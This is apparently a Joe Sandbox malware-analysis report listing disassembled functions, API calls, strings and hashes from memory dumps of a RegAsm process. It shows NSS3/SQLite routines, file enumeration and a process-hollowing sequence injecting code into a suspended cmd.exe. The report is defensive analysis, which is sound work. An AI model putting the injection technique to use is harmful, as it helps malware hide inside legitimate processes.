Part of subcall function 6C0DCA30: EnterCriticalSection.KERNEL32(?,?,?,6C13F9C9,?,6C13F4DA,6C13F9C9,?,?,6C10369A), ref: 6C0DCA7A
Part of subcall function 6C0DCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C0DCB26

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C1425B2
memset.VCRUNTIME140(00000000,00000000,00000079), ref: 6C1425DE
sqlite3_snprintf.NSS3(-0000000F,00000068,%s-shm,?), ref: 6C142604
sqlite3_initialize.NSS3 ref: 6C14269D
sqlite3_uri_parameter.NSS3(?,readonly_shm), ref: 6C1426D6
sqlite3_initialize.NSS3 ref: 6C14289F
EnterCriticalSection.KERNEL32(?), ref: 6C1429CD
LeaveCriticalSection.KERNEL32(?), ref: 6C142A26
sqlite3_free.NSS3(?), ref: 6C142B30

Strings

winShmMap3, xrefs: 6C142C08, 6C142C3D
readonly_shm, xrefs: 6C1426CE
winShmMap1, xrefs: 6C142AB0
winShmMap2, xrefs: 6C142BD0
winOpenShm, xrefs: 6C142B7E
winFileSize, xrefs: 6C142A7D
&l, xrefs: 6C1427CB
0&l, xrefs: 6C142AE9
P&l, xrefs: 6C142A51, 6C142A90, 6C142B0A, 6C142B66, 6C142BB0, 6C142BE0, 6C142C1A
%s-shm, xrefs: 6C1425FD
&l, xrefs: 6C142900

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterLeavesqlite3_initialize$memsetsqlite3_freesqlite3_snprintfsqlite3_uri_parameterstrlen
String ID: &l$ &l$%s-shm$0&l$P&l$readonly_shm$winFileSize$winOpenShm$winShmMap1$winShmMap2$winShmMap3
API String ID: 3867263885-324264135
Opcode ID: 4262c9963c6d72e863e50dd0a4b26dfab643035501c23faf80f866fc77f65d5f
Instruction ID: f8e4e1317a60872a4c9b6bf6fa3f329cb2215d8ea1e20de6ce19b9b469cc3ee9
Opcode Fuzzy Hash: 4262c9963c6d72e863e50dd0a4b26dfab643035501c23faf80f866fc77f65d5f
Instruction Fuzzy Hash: CB12BD71A046019FDB08CF25E898A6A77F1FF8A318F158528EC15D7B80DB34E896CB91

Function 6C144420 Relevance: 34.4, APIs: 10, Strings: 9, Instructions: 1186stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C144EE3

Strings

-, xrefs: 6C144FBA
40f-21a-21d, xrefs: 6C1444D0
a generated column, xrefs: 6C144D58, 6C144E8B
non-deterministic use of %s() in %s, xrefs: 6C144D71, 6C144EA4
a CHECK constraint, xrefs: 6C144D62, 6C144D6D, 6C144E95, 6C144EA0
second, xrefs: 6C144BCA
an index, xrefs: 6C144D53, 6C144E86
weekday , xrefs: 6C1454AB
start of , xrefs: 6C14517A

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: strlen
String ID: -$40f-21a-21d$a CHECK constraint$a generated column$an index$non-deterministic use of %s() in %s$second$start of $weekday
API String ID: 39653677-183924012
Opcode ID: 3fb5277cbbe83433790b4d89fa04661ab60052e5cc8cca6c44b0667b93225e8d
Instruction ID: dff022aabd58330155264c8734e6ddb963e90252b8b171d77d9a19cc0cc8eb41
Opcode Fuzzy Hash: 3fb5277cbbe83433790b4d89fa04661ab60052e5cc8cca6c44b0667b93225e8d
Instruction Fuzzy Hash: 39A210716087848FDB11CF25C06076BB7E2AF96318F14C65DE8E99BB82E735E886C741

Function 6C13ECD0 Relevance: 33.8, APIs: 7, Strings: 12, Instructions: 539COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6C13ED38

Part of subcall function 6C0D4F60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C0D4FC4

sqlite3_mprintf.NSS3(snippet), ref: 6C13EF3C
sqlite3_mprintf.NSS3(offsets), ref: 6C13EFE4

Part of subcall function 6C1FDFC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000003,?,6C0D5001,?,00000003,00000000), ref: 6C1FDFD7

sqlite3_mprintf.NSS3(matchinfo), ref: 6C13F087
sqlite3_mprintf.NSS3(matchinfo), ref: 6C13F129
sqlite3_mprintf.NSS3(optimize), ref: 6C13F1D1
sqlite3_free.NSS3(?), ref: 6C13F368

Strings

snippet, xrefs: 6C13EF05, 6C13EF37, 6C13EF7C
offsets, xrefs: 6C13EFAF, 6C13EFDF, 6C13F01F
fts3, xrefs: 6C13F247
optimize, xrefs: 6C13F199, 6C13F1CC, 6C13F211
fts4, xrefs: 6C13F2AD
porter, xrefs: 6C13ED97
fts3_tokenizer, xrefs: 6C13EE1A, 6C13EEA8
simple, xrefs: 6C13ED79
matchinfo, xrefs: 6C13F04F, 6C13F082, 6C13F0C2, 6C13F0F2, 6C13F124, 6C13F169
unicode61, xrefs: 6C13EDB5
fts4aux, xrefs: 6C13ECF9
fts3tokenize, xrefs: 6C13F30F

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: sqlite3_mprintf$strlen$sqlite3_freesqlite3_initialize
String ID: fts3$fts3_tokenizer$fts3tokenize$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
API String ID: 2518200370-449611708
Opcode ID: eab818cf87a22984b5fd801e6e32ac11f6bb7e879a67a8ba8b928f944774e7ad
Instruction ID: 38b611b26894ccb6c729e7ba0ec0a1bbb17665f3a952ef807b2edf5a62f8f953
Opcode Fuzzy Hash: eab818cf87a22984b5fd801e6e32ac11f6bb7e879a67a8ba8b928f944774e7ad
Instruction Fuzzy Hash: 8D0203B5B047108BE7049F61A88972B76B2ABD530CF14993CDC6D57B80EF74E84AC792

Function 6C17A4D0 Relevance: 32.0, APIs: 13, Strings: 5, Instructions: 501stringCOMMON

Download Yara Rule

APIs

PL_strncasecmp.NSS3(6C1528AD,pkcs11:,00000007), ref: 6C17A501
PORT_Strdup_Util.NSS3(6C1528AD), ref: 6C17A514

Part of subcall function 6C1B0F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C152AF5,?,?,?,?,?,6C150A1B,00000000), ref: 6C1B0F1A
Part of subcall function 6C1B0F10: malloc.MOZGLUE(00000001), ref: 6C1B0F30
Part of subcall function 6C1B0F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C1B0F42

strchr.VCRUNTIME140(00000000,0000003A), ref: 6C17A529
PK11_GetInternalKeySlot.NSS3 ref: 6C17A60D
PR_SetError.NSS3(FFFFE041,00000000), ref: 6C17A74B
PR_SetError.NSS3(FFFFE041,00000000), ref: 6C17A777
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C17A80C
memcmp.VCRUNTIME140(?,00000001,00000000), ref: 6C17A82B
CERT_DestroyCertificate.NSS3(00000000), ref: 6C17A952
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C17A9C3

Part of subcall function 6C1A0960: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,?,6C17A8F5,00000000,?,00000010), ref: 6C1A097E
Part of subcall function 6C1A0960: memcmp.VCRUNTIME140(?,00000000,6C17A8F5,00000010), ref: 6C1A098D

free.MOZGLUE(00000000), ref: 6C17AB18
strchr.VCRUNTIME140(?,00000040), ref: 6C17AB40
free.MOZGLUE(?), ref: 6C17ABE1

Part of subcall function 6C174170: TlsGetValue.KERNEL32(?,6C1528AD,00000000,?,6C17A793,?,00000000), ref: 6C17419F
Part of subcall function 6C174170: EnterCriticalSection.KERNEL32(0000001C), ref: 6C1741AF
Part of subcall function 6C174170: PR_Unlock.NSS3(?), ref: 6C1741D4

Strings

token, xrefs: 6C17A875
pkcs11:, xrefs: 6C17A4FB
model, xrefs: 6C17A8CF
object, xrefs: 6C17A5CF
manufacturer, xrefs: 6C17A8A2

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: strlen$Errorfreememcmpstrchr$CertificateCriticalDestroyEnterInternalK11_L_strncasecmpSectionSlotStrdup_UnlockUtilValuemallocmemcpy
String ID: manufacturer$model$object$pkcs11:$token
API String ID: 916065474-709816111
Opcode ID: 0f8f7cddb0c37cce98447e6ab17893b483f86e28146ebaf80f29cc7c7eaa4726
Instruction ID: 41f96435f34316cb40dd1c09f531f7a2b40ef6851ffb11c3f6cd9b3e02c43ebd
Opcode Fuzzy Hash: 0f8f7cddb0c37cce98447e6ab17893b483f86e28146ebaf80f29cc7c7eaa4726
Instruction Fuzzy Hash: 760295B5D002189FFF319B259C41B9A7679AF11308F1400A4E90CA6B52FB31DE69CFA2

Function 00415A63 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 179stringmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 00415A88
HeapAlloc.KERNEL32(00000000), ref: 00415A8F
wsprintfA.USER32 ref: 00415AA8
FindFirstFileA.KERNEL32(?,?), ref: 00415ABF
StrCmpCA.SHLWAPI(?,00436A8C), ref: 00415AE0
StrCmpCA.SHLWAPI(?,00436A90), ref: 00415AFA
wsprintfA.USER32 ref: 00415B21

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416FD4,004366CB,?,?,?,?,004184E8), ref: 0041050D

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,004366FB,?), ref: 00411C79

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,00417542,004366F5), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417013,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 004105BD

Part of subcall function 00415765: _memset.LIBCMT ref: 0041579D
Part of subcall function 00415765: _memset.LIBCMT ref: 004157AE
Part of subcall function 00415765: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 004157D9
Part of subcall function 00415765: lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 004157F7
Part of subcall function 00415765: lstrcatA.KERNEL32(?,?,?,?,?,?,?,?), ref: 0041580B
Part of subcall function 00415765: lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 0041581E
Part of subcall function 00415765: StrStrA.SHLWAPI(00000000), ref: 004158C2

FindNextFileA.KERNEL32(?,?), ref: 00415C30
FindClose.KERNEL32(?), ref: 00415C44
lstrcatA.KERNEL32(?), ref: 00415C72
lstrcatA.KERNEL32(?), ref: 00415C85
lstrlenA.KERNEL32(?), ref: 00415C91
lstrlenA.KERNEL32(?), ref: 00415CAE

Strings

%s\*, xrefs: 00415AA2
%s\%s, xrefs: 00415B1B

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$Findlstrlen$FileHeap_memsetwsprintf$AllocCloseFirstNextProcessSystemTime
String ID: %s\%s$%s\*
API String ID: 2347508687-2848263008
Opcode ID: 42134cd124e8a2dcf05e5c8cd076424bbfd4b1c9485b120d0dfeab28c7b739f2
Instruction ID: b3dbc7f5073945e861be6b757856f6c014b171f0602f1f73fdf2b90436096806
Opcode Fuzzy Hash: 42134cd124e8a2dcf05e5c8cd076424bbfd4b1c9485b120d0dfeab28c7b739f2
Instruction Fuzzy Hash: 3B714EB190022D9BCF20EF61DD4AACD7779AF45305F0004EAA609B3191EB75AEC5CF59

Function 0040F54A Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 130threadinjectionmemoryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040F57C
CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,004365A7,00000000,00000000,00000001,00000004,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0040F5A0
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0040F5B2
GetThreadContext.KERNEL32(?,00000000), ref: 0040F5C4
ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0040F5E2
VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 0040F5F8
ResumeThread.KERNEL32(?), ref: 0040F608
WriteProcessMemory.KERNEL32(?,00000000,00412CB7,?,00000000), ref: 0040F627
WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0040F65D
WriteProcessMemory.KERNEL32(?,?,D7EEE8F4,00000004,00000000), ref: 0040F684
SetThreadContext.KERNEL32(?,00000000), ref: 0040F696
ResumeThread.KERNEL32(?), ref: 0040F69F

Strings

(, xrefs: 0040F666
C:\Windows\System32\cmd.exe, xrefs: 0040F59B

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$MemoryThread$Write$AllocContextResumeVirtual$CreateRead_memset
String ID: ($C:\Windows\System32\cmd.exe
API String ID: 3621800378-4087486346
Opcode ID: a8dc4d51f7efddbccc41cf0b9be27493f9074f0e6a4b2804b52379f32e11be58
Instruction ID: ce0bc2f2ab5a7fa4663cc0973bcd20d3e5a9914badfe9095349abcbc4eb1f996
Opcode Fuzzy Hash: a8dc4d51f7efddbccc41cf0b9be27493f9074f0e6a4b2804b52379f32e11be58
Instruction Fuzzy Hash: AF414772A00208AFDB20CFA8DC85FAAB7B9FF48705F144475FA01E61A1D775AD448B25

Function 6C1AA5E0 Relevance: 23.1, APIs: 15, Instructions: 574COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cccbbaef0c882cc17637d24588cb0d631d8260f9a277f00612022cf648304da
Instruction ID: c2468ac75299b98b56eb5c3ea5a517a35a030b055e5e9e250ef2151ad6243796
Opcode Fuzzy Hash: 8cccbbaef0c882cc17637d24588cb0d631d8260f9a277f00612022cf648304da
Instruction Fuzzy Hash: 57128138D042584FCB25CEE888913EEB7F2AF1A318F2841DAC59997A41D2354EC7CF91

Function 6C180570 Relevance: 22.8, APIs: 15, Instructions: 256memoryCOMMON

Download Yara Rule

APIs

PK11_HPKE_Deserialize.NSS3(?,?,?,00000000), ref: 6C1805E3
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C18060C
PK11_HPKE_DestroyContext.NSS3(?,00000000), ref: 6C18061A
PK11_PubDeriveWithKDF.NSS3 ref: 6C180712
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C180740
memcpy.VCRUNTIME140(?,00000006,?), ref: 6C180760
PR_SetError.NSS3(FFFFE00E,00000000), ref: 6C1807AE
PK11_FreeSymKey.NSS3(?), ref: 6C1807BC
PK11_FreeSymKey.NSS3(?), ref: 6C1807D1
SECKEY_DestroyPublicKey.NSS3(?), ref: 6C1807DD
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C1807EB
SECITEM_ZfreeItem_Util.NSS3(00000001,00000001), ref: 6C1807F8
PK11_CreateContextBySymKey.NSS3(?,82000105,?,?), ref: 6C18082F
memcpy.VCRUNTIME140(?,?,?), ref: 6C1808A9
SECITEM_DupItem_Util.NSS3(?), ref: 6C1808D0

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: K11_$Item_Util$ContextDestroyErrorFreeZfreememcpy$AllocCreateDeriveDeserializePublicWith
String ID:
API String ID: 657680294-0
Opcode ID: f39d1e6ce0e2e3cc33e4e4f76fcd1919dcf52a9291ddb9db8541fcfae34bd1a2
Instruction ID: 330768856da27b4915acf45de890aabb75afe4dc983b6a93368d730fb1e39544
Opcode Fuzzy Hash: f39d1e6ce0e2e3cc33e4e4f76fcd1919dcf52a9291ddb9db8541fcfae34bd1a2
Instruction Fuzzy Hash: AD91C1B1A0A3449BEB00CF25DC44B5B77F1AF94318F14862CE99987791EB31D899CF92

Function 6C0DECC0 Relevance: 20.0, APIs: 8, Strings: 3, Instructions: 741COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C0DED0A
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C0DEE68
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C0DEF87
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?), ref: 6C0DEF98

Strings

%s at line %d of [%.10s], xrefs: 6C0DF492
database corruption, xrefs: 6C0DF48D
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C0DF483

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: _byteswap_ulong
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 4101233201-598938438
Opcode ID: b000944b6a31856b1fc5a1f05056070b82bf4a667a5232e35151d353a54594d1
Instruction ID: e160e14647048ab41c975e19c1cd03eaf4696a191b95b3f7c069bf66f5c396d2
Opcode Fuzzy Hash: b000944b6a31856b1fc5a1f05056070b82bf4a667a5232e35151d353a54594d1
Instruction Fuzzy Hash: 4362F070A043458FEB04CF28C484BAEBBF5BF49318F1A8199D9555BB92D731F886CB91

Function 6C228550 Relevance: 16.3, APIs: 8, Strings: 1, Instructions: 528stringCOMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000021B,recovered %d pages from %s,00000000,?), ref: 6C2285CC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C2286CA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C22875F
memset.VCRUNTIME140(?,00000000,?), ref: 6C22893A
sqlite3_free.NSS3(?), ref: 6C228977
sqlite3_free.NSS3 ref: 6C2289A5
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C228B68
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C228B79

Strings

recovered %d pages from %s, xrefs: 6C2285C2

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@sqlite3_free$memsetsqlite3_logstrcmpstrlen
String ID: recovered %d pages from %s
API String ID: 1138475946-1623757624
Opcode ID: 104de4792bdf4217761d53a5ae158ff73823886b9410e54af379d6d7843d443b
Instruction ID: f3e08b9395879ce14da16807388a122c6658d5233ab4fc518a379cb9b86b2aa2
Opcode Fuzzy Hash: 104de4792bdf4217761d53a5ae158ff73823886b9410e54af379d6d7843d443b
Instruction Fuzzy Hash: 411239766083059FD704CF29C894B6BB7E5EF89308F04892DF99A87751EB39E844CB52

Function 6C1A6C00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 190memorytimeCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C151C6F,00000000,00000004,?,?), ref: 6C1A6C3F

Part of subcall function 6C1FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C1FC2BF

PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6C151C6F,00000000,00000004,?,?), ref: 6C1A6C60
PR_ExplodeTime.NSS3(00000000,6C151C6F,?,?,?,?,?,00000000,00000000,00000000,?,6C151C6F,00000000,00000004,?,?), ref: 6C1A6C94

Strings

gfff, xrefs: 6C1A6D9C
gfff, xrefs: 6C1A6CF5
gfff, xrefs: 6C1A6D66
gfff, xrefs: 6C1A6CFD
gfff, xrefs: 6C1A6D30

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

